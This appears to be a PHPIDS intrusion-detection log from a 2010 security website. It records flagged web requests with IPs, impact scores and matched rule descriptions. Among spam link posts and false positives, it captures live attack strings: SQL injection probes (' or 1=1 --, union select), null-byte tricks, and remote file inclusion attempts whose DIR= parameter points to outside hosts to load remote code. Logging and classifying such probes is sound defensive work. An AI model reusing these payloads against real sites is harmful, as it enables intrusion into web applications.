| ID: | 122821 | | Name: | REQUEST.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 58.187.67.100 | | Impact: | 20 | | Created: | 2010-04-29 02:38:47 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122822 | | Name: | GET.page | | Value: | backtrack-3 and 0=1 union select -man/nemesis-ip | | Page: | /i.php?page=backtrack-3+and+0=1+union+select+-man/nemesis-ip | | IP: | 58.187.67.100 | | Impact: | 20 | | Created: | 2010-04-29 02:38:47 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23 Description: Detects MSSQL code execution and information gathering attempts | Tags: sqli, id | ID: 55
|
| ID: | 122819 | | Name: | REQUEST.page | | Value: | ' or 1=1 -- | | Page: | /i.php?page=%27%20or%201=1%20-- | | IP: | 67.195.111.36 | | Impact: | 44 | | Created: | 2010-04-29 01:38:42 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 122820 | | Name: | GET.page | | Value: | ' or 1=1 -- | | Page: | /i.php?page=%27%20or%201=1%20-- | | IP: | 67.195.111.36 | | Impact: | 44 | | Created: | 2010-04-29 01:38:42 | | Details: | Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects classic SQL injection probings 1/2 | Tags: sqli, id, lfi | ID: 42 Description: Detects classic SQL injection probings 2/2 | Tags: sqli, id, lfi | ID: 43 Description: Detects basic SQL authentication bypass attempts 1/3 | Tags: sqli, id, lfi | ID: 44
|
| ID: | 122817 | | Name: | REQUEST.page | | Value: | zaurusmain?lastverified=07-MAR-2004 | | Page: | /i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004 | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-04-29 01:35:29 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122818 | | Name: | GET.page | | Value: | zaurusmain?lastverified=07-MAR-2004 | | Page: | /i.php?submenu=zaurusheader&page=zaurusmain?lastverified=07-MAR-2004 | | IP: | 67.195.111.36 | | Impact: | 10 | | Created: | 2010-04-29 01:35:29 | | Details: | Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
|
| ID: | 122815 | | Name: | REQUEST.page | | Value: | suckmydick.php backtrack-3-man/runscript | | Page: | /i.php?page=suckmydick.php%00backtrack-3-man/runscript | | IP: | 202.152.243.170 | | Impact: | 10 | | Created: | 2010-04-28 19:46:46 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122816 | | Name: | GET.page | | Value: | suckmydick.php backtrack-3-man/runscript | | Page: | /i.php?page=suckmydick.php%00backtrack-3-man/runscript | | IP: | 202.152.243.170 | | Impact: | 10 | | Created: | 2010-04-28 19:46:46 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122813 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 20 | | Created: | 2010-04-28 19:39:24 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122814 | | Name: | GET.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 20 | | Created: | 2010-04-28 19:39:24 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122809 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 20 | | Created: | 2010-04-28 19:35:53 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122810 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 26 | | Created: | 2010-04-28 19:35:53 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122811 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 20 | | Created: | 2010-04-28 19:35:53 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122812 | | Name: | GET.page | | Value: | reviews/chaosnetworks //include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | Page: | /i.php?page=reviews/chaosnetworks%20%20//include/scripts/export_batch.inc.php?DIR=http://orelhas.pt/images/stories/id1????? | | IP: | 92.240.42.10 | | Impact: | 26 | | Created: | 2010-04-28 19:35:53 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects common comment types | Tags: xss, csrf, id | ID: 35 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122807 | | Name: | REQUEST.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 84.19.169.162 | | Impact: | 10 | | Created: | 2010-04-28 18:46:03 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122808 | | Name: | GET.page | | Value: | http://www.reiluke.site90.com/index.php? security/hackingillustrated | | Page: | /i.php?page=http://www.reiluke.site90.com/index.php?%00security/hackingillustrated | | IP: | 84.19.169.162 | | Impact: | 10 | | Created: | 2010-04-28 18:46:03 | | Details: | Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39
|
| ID: | 122805 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=humor/humor | | Page: | /i.php?page=videos/pn12/i.php?page=humor/humor | | IP: | 184.73.63.115 | | Impact: | 10 | | Created: | 2010-04-28 18:30:04 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 122806 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=humor/humor | | Page: | /i.php?page=videos/pn12/i.php?page=humor/humor | | IP: | 184.73.63.115 | | Impact: | 10 | | Created: | 2010-04-28 18:30:04 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 122803 | | Name: | REQUEST.page | | Value: | videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | Page: | /i.php?page=videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 184.73.63.115 | | Impact: | 10 | | Created: | 2010-04-28 18:30:00 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 122804 | | Name: | GET.page | | Value: | videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | Page: | /i.php?page=videos/pn12/i.php?page=campuses-that-use-irongeek-for-teaching-infosec-in-higher-education | | IP: | 184.73.63.115 | | Impact: | 10 | | Created: | 2010-04-28 18:30:00 | | Details: | Description: Detects basic obfuscated JavaScript script injections | Tags: xss, csrf | ID: 24
|
| ID: | 122801 | | Name: | REQUEST.codeme | | Value: | Very interesting sites., <a href= http://technorati.com/people/fossilpurses#1 >fossil purses</a> [url=http://technorati.com/people/fossilpurses#1]fossil purses[/url], 4914, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 15:52:51 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122802 | | Name: | POST.codeme | | Value: | Very interesting sites., <a href= http://technorati.com/people/fossilpurses#1 >fossil purses</a> [url=http://technorati.com/people/fossilpurses#1]fossil purses[/url], 4914, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 15:52:51 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122798 | | Name: | GET.page | | Value: | security/louisville-metasploit-class)
Friendsof the Podcast:
Webhosting services:WebSpeedway
Interviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg | | Page: | /i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w | | IP: | 67.207.201.163 | | Impact: | 24 | | Created: | 2010-04-28 15:20:31 | | Details: | Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg Impact: 12 | Tags: xss, csrf, id, rfe, lfi Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
|
| ID: | 122799 | | Name: | REQUEST.page | | Value: | security/louisville-metasploit-class)
Friendsof the Podcast:
Webhosting services:WebSpeedway
Interviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg />
Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png | | Page: | /i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w | | IP: | 67.207.201.163 | | Impact: | 32 | | Created: | 2010-04-28 15:20:31 | | Details: | Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png Impact: 16 | Tags: xss, csrf, id, rfe, lfi Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122800 | | Name: | GET.page | | Value: | security/louisville-metasploit-class)
Friendsof the Podcast:
Webhosting services:WebSpeedway
Interviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg />
Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png | | Page: | /i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w | | IP: | 67.207.201.163 | | Impact: | 32 | | Created: | 2010-04-28 15:20:31 | | Details: | Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg width=50 />
<img src=/wp-content/uploads/2010/03/itunes2.jpg /> Audio Feed:<img src=/wp-content/uploads/2010/03/RSSBlue1.png Impact: 16 | Tags: xss, csrf, id, rfe, lfi Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38 Description: finds attribute breaking injections including obfuscated attributes | Tags: xss, csrf | ID: 68
|
| ID: | 122797 | | Name: | REQUEST.page | | Value: | security/louisville-metasploit-class)
Friendsof the Podcast:
Webhosting services:WebSpeedway
Interviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg | | Page: | /i.php?page=security/louisville-metasploit-class)%0AFriendsof%20the%20Podcast:%0AWebhosting%20services:WebSpeedway%0AInterviewwith%20Everett%20Washington%20Way%20Professional%20Services.%C2%A0%20Everett%20specializesin%20Security%20program%20building,%20w | | IP: | 67.207.201.163 | | Impact: | 24 | | Created: | 2010-04-28 15:20:30 | | Details: | Webhosting services:WebSpeedwayInterviewwith Everett Washington Way Professional Services. Everett specializesin Security program building, with specific focus on SecurityAssessments and Audits. He has been instrumental in implementingVulnerability and Risk Management Solutions. We get Everett to talk tous about his experiences and recommendations for building a successfulInformation Security program.
Comments are closed.
Call with questions or comments about the Podcast (404) 890-5379
Follow Us:<img src=/wp-content/uploads/2010/03/twitter.jpg Impact: 12 | Tags: xss, csrf, id, rfe, lfi Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects possibly malicious html elements including some attributes | Tags: xss, csrf, id, rfe, lfi | ID: 38
|
| ID: | 122795 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:02:19 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122796 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:02:19 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122793 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:44 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122794 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:44 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122791 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:43 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122792 | | Name: | GET.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:43 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122787 | | Name: | REQUEST.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:41 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122788 | | Name: | GET.page | | Value: | reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews/chaosnetworks//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:41 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122789 | | Name: | REQUEST.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:41 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122790 | | Name: | GET.page | | Value: | reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | Page: | /i.php?page=reviews//include/scripts/export_batch.inc.php?DIR=http://geo.metodist.ru/images/id? | | IP: | 199.120.90.223 | | Impact: | 20 | | Created: | 2010-04-28 15:01:41 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122785 | | Name: | REQUEST.codeme | | Value: | What?, <a href= http://technorati.com/people/telemarketingleads#1 >Best telemarketing leads</a> [url=http://technorati.com/people/telemarketingleads#1]Best telemarketing leads[/url], ejkhhu, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 14:05:01 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122786 | | Name: | POST.codeme | | Value: | What?, <a href= http://technorati.com/people/telemarketingleads#1 >Best telemarketing leads</a> [url=http://technorati.com/people/telemarketingleads#1]Best telemarketing leads[/url], ejkhhu, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 36 | | Created: | 2010-04-28 14:05:01 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7 Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122783 | | Name: | REQUEST.codeme | | Value: | What?, http://technorati.com/people/coedsneedcash coeds need cash now, jlw, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 10 | | Created: | 2010-04-28 13:15:38 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
|
| ID: | 122784 | | Name: | POST.codeme | | Value: | What?, http://technorati.com/people/coedsneedcash coeds need cash now, jlw, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 10 | | Created: | 2010-04-28 13:15:38 | | Details: | Description: Detects JavaScript with(), ternary operators and XML predicate attacks | Tags: xss, csrf | ID: 7
|
| ID: | 122781 | | Name: | REQUEST.codeme | | Value: | Incredible site!, <a href= http://technorati.com/people/automobileinsurancerules >automobile insurance rules price</a>, [url= http://technorati.com/people/automobileinsurancerules ]automobile insurance rules price[/url], 6797, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 11:35:20 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122782 | | Name: | POST.codeme | | Value: | Incredible site!, <a href= http://technorati.com/people/automobileinsurancerules >automobile insurance rules price</a>, [url= http://technorati.com/people/automobileinsurancerules ]automobile insurance rules price[/url], 6797, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 16 | | Created: | 2010-04-28 11:35:20 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33
|
| ID: | 122779 | | Name: | REQUEST.codeme | | Value: | Only, <a href= http://technorati.com/people/iamlookingfordiscountairlineti#1 >i am looking for discount airline tickets</a> [url=http://technorati.com/people/iamlookingfordiscountairlineti#1]i am looking for discount airline tickets[/url], xva, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 10:45:08 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122780 | | Name: | POST.codeme | | Value: | Only, <a href= http://technorati.com/people/iamlookingfordiscountairlineti#1 >i am looking for discount airline tickets</a> [url=http://technorati.com/people/iamlookingfordiscountairlineti#1]i am looking for discount airline tickets[/url], xva, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 26 | | Created: | 2010-04-28 10:45:08 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61
|
| ID: | 122777 | | Name: | REQUEST.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-28 10:37:34 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 122778 | | Name: | COOKIE.BCSI-AC-4E050338BC5CF7E7 | | Value: | 1AAE78F800000005NbR0n41gqisJMk1jmtRCRA8 SAEgAAAABQAAADa8HQCAcAAAAAAAACHVAAA= | | Page: | / | | IP: | 170.167.4.200 | | Impact: | 22 | | Created: | 2010-04-28 10:37:34 | | Details: | Description: Detects common XSS concatenation patterns 2/2 | Tags: xss, csrf, id, rfe | ID: 31 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: 3.49 Ratio: 3.0769230769231 Converted: ((++:
|
| ID: | 122775 | | Name: | REQUEST.codeme | | Value: | really great sites, thank you, <a href= http://technorati.com/people/prepaidvisatravelcard#1 >prepaid visa travel card here</a> [url=http://technorati.com/people/prepaidvisatravelcard#1]prepaid visa travel card here[/url], %-OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-28 09:55:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++::
|
| ID: | 122776 | | Name: | POST.codeme | | Value: | really great sites, thank you, <a href= http://technorati.com/people/prepaidvisatravelcard#1 >prepaid visa travel card here</a> [url=http://technorati.com/people/prepaidvisatravelcard#1]prepaid visa travel card here[/url], %-OO, | | Page: | /xss-sql-injection-fuzzing-barcode-generator.php | | IP: | 91.214.44.182 | | Impact: | 40 | | Created: | 2010-04-28 09:55:13 | | Details: | Description: Detects JavaScript language constructs | Tags: xss, csrf, id, rfe | ID: 20 Description: Detects obfuscated script tags and XML wrapped HTML | Tags: xss | ID: 33 Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61 Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67
Centrifuge detection data Threshold: --- Ratio: --- Converted: ((++::
|
